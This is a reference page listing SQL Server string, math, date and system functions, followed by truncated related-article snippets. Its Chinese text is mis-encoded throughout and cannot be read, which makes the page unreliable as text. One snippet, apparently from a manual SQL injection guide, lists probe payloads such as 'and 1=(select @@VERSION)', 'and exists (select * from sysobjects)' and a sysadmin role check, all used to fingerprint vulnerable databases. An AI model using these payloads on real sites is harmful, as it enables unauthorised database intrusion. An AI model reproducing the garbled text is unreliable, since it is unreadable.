Sql Server »ù±¾º¯Êý
1.×Ö·û´®º¯Êý
³¤¶ÈÓë·ÖÎöÓÃ
datalength(Char_expr) ·µ»Ø×Ö·û´®°üº¬×Ö·ûÊý,µ«²»°üº¬ºóÃæµÄ¿Õ¸ñ
substring(expression,start,length) ²»¶à˵ÁË,È¡×Ó´®
right(char_expr,int_expr) ·µ»Ø×Ö·û´®ÓÒ±ßint_expr¸ö×Ö·û
×Ö·û²Ù×÷Àà
upper(char_expr) תΪ´óд
lower(char_expr) תΪСд
space(int_expr) Éú³Éint_expr¸ö¿Õ¸ñ
replicate(char_expr,int_expr)¸´ÖÆ×Ö·û´®int_expr´Î
reverse(char_expr) ·´×ª×Ö·û´®
stuff(char_expr1,start,length,char_expr2) ½«×Ö·û´®char_expr1ÖеĴÓ
start¿ªÊ¼µÄlength¸ö×Ö·ûÓÃchar_expr2´úÌæ
ltrim(char_expr) rtrim(char_expr) È¡µô¿Õ¸ñ
ascii(char) char(ascii) Á½º¯Êý¶ÔÓ¦,È¡asciiÂë,¸ù¾ÝasciiÂðÈ¡×Ö·û
×Ö·û´®²éÕÒ
charindex(char_expr,expression) ·µ»Øchar_exprµÄÆðʼλÖÃ
patindex("%pattern%",expression) ·µ»ØÖ¸¶¨Ä£Ê½µÄÆðʼλÖÃ,·ñÔòΪ0
2.Êýѧº¯Êý
abs(numeric_expr) Çó¾ø¶ÔÖµ
ceiling(numeric_expr) È¡´óÓÚµÈÓÚÖ¸¶¨ÖµµÄ×îСÕûÊý
exp(float_expr) È¡Ö¸Êý
floor(numeric_expr) СÓÚµÈÓÚÖ¸¶¨ÖµµÃ×î´óÕûÊý
pi() 3.1415926.........
power(numeric_expr,power) ·µ»Øpower´Î·½
rand([int_expr]) Ëæ»úÊý²úÉúÆ÷
round(numeric_expr,int_expr) °²int_expr¹æ¶¨µÄ¾«¶ÈËÄÉáÎåÈë
sign(int_expr) ¸ù¾ÝÕýÊý,0,¸ºÊý,,·µ»Ø+1,0,-1
sqrt(float_expr) ƽ·½¸ù
3.ÈÕÆÚº¯Êý
getdate() ·µ»ØÈÕÆÚ
datename(datepart,date_expr) ·µ»ØÃû³ÆÈç June
datepart(datepart,date_expr) È¡ÈÕÆÚÒ»²¿·Ý
datediff(datepart,date_expr1.dateexpr2) ÈÕÆÚ²î
dateadd(datepart,number,date_expr) ·µ»ØÈÕÆÚ¼ÓÉÏ number
ÉÏÊöº¯ÊýÖÐdatepartµÄ
д·¨ È¡ÖµºÍÒâÒå
yy 1753-9999 Äê·Ý
qq 1-4 ¿Ì
mm 1-12 ÔÂ
dy 1-366 ÈÕ
dd 1-31 ÈÕ
wk 1-54 ÖÜ
dw 1-7 Öܼ¸
hh 0-23 Сʱ
mi 0-59 ·ÖÖÓ
ss 0-59 Ãë
ms 0-999 ºÁÃë
ÈÕÆÚת»»
convert()
4.ϵͳº¯Êý
suser_name() Óû§µÇ¼Ãû
user_name() Óû§ÔÚÊý¾Ý¿âÖеÄÃû×Ö
user Óû§ÔÚÊý¾Ý¿âÖеÄÃû×Ö
show_role() ¶Ôµ±Ç°Óû§Æð×÷ÓõĹæÔò
db_name() Êý¾Ý¿âÃû
object_name(obj_id) Êý¾Ý¿â¶ÔÏóÃû
col_name(obj_id,col_id) ÁÐÃû
col_length(objname,colname) Á㤶È
valid_name(char_expr) ÊÇ·ñÊÇÓÐЧ±êʶ·û
Ïà¹ØÎĵµ£º
and exists (select * from sysobjects) //ÅжÏÊÇ·ñÊÇMSSQL
and exists(select * from tableName) //ÅжÏij±íÊÇ·ñ´æÔÚ..tableNameΪ±íÃû
and 1=(select @@VERSION) //MSSQL°æ±¾
And 1=(select db_name()) //µ±Ç°Êý¾Ý¿âÃû
and 1=(select @@servername) //±¾µØ·þÎñÃû
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //Å ......
SQLÊÖ¹¤×¢Èë´óÈ«
2006Äê08ÔÂ11ÈÕ ÐÇÆÚÎå 21:00
±È·½ËµÔÚ²éѯidÊÇ50µÄÊý¾Ýʱ£¬Èç¹ûÓû§´«½üÀ´µÄ²ÎÊýÊÇ50 and 1=1£¬Èç¹ûûÓÐÉèÖùýÂ˵Ļ°£¬¿ÉÒÔÖ±½Ó²é³öÀ´£¬SQL ×¢ÈëÒ»°ãÔÚASP³ÌÐòÖÐÓöµ½×î¶à£¬
¿´¿´ÏÂÃæµÄ
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and ......
PL/SQL ²»¾ß±¸ÊäÈëÊä³öµÄÄÜÁ¦
µ«ÊÇ¿ÉÒÔÒÀ¿¿»·¾³À´Ö´ÐÐÊýÖµµÄÊäÈëÊä³ö¸øPL/SQL ¿é
SQLPLUS »·¾³ÓÃsubstitution variables ºÍ host(bind) variable À´´«ÈëÊýÖµ¸øPL/SQL¿é
substitution variable: such as a preceding ampersand &a
host(bind) variable : such as a preceding colon :x
Ìæ ......
SQL ServerµÄ²¹¶¡°æ±¾¼ì²é²»ÈçWindows ²¹¶¡°æ±¾¼ì²éÖ±½Ó£¬Ò»¸öϵͳ¹ÜÀíÔ±£¬Èç¹û²»Á˽âSQL Server°æ±¾¶ÔÓ¦µÄ²¹¶¡ºÅ£¬¿ÉÄÜÒ²»áÓöµ½Ò»µãÂé·³£¬Òò´ËÔÚÕâ˵Ã÷һϣ¬Í¨¹ýÕâÑùµÄ°ì·¨Åбð»úÆ÷ÊÇ°²È«µÄ°ì·¨£¬²»»á¶Ôϵͳ²úÉúÈκÎÓ°Ïì¡£
¡¡
1¡¢ÓÃIsql»òÕßSQL²éѯ·ÖÎöÆ÷µÇ¼µ½SQL Server£¬Èç¹ûÊÇÓÃIsql£¬ÇëÔÚcmd´°¿ÚÊäÈëisql -U sa,È» ......
½ñÌìÕÒµ½ÁËÈ¡mysql±íºÍ×Ö¶Î×¢Ê͵ÄÓï¾ä
È¡×Ö¶Î×¢ÊÍ
SELECT COLUMN_NAME ÁÐÃû, DATA_TYPE ×Ö¶ÎÀàÐÍ, COLUMN_COMMENT ×Ö¶Î×¢ÊÍ
from INFORMATION_SCHEMA.COLUMNS
WHERE table_name = 'companies'##±íÃû
AND table_schema = 'testhuicard'##Êý¾Ý¿âÃû
AND column_name LIKE 'c_name'##×Ö¶ÎÃû
--------------------------- ......
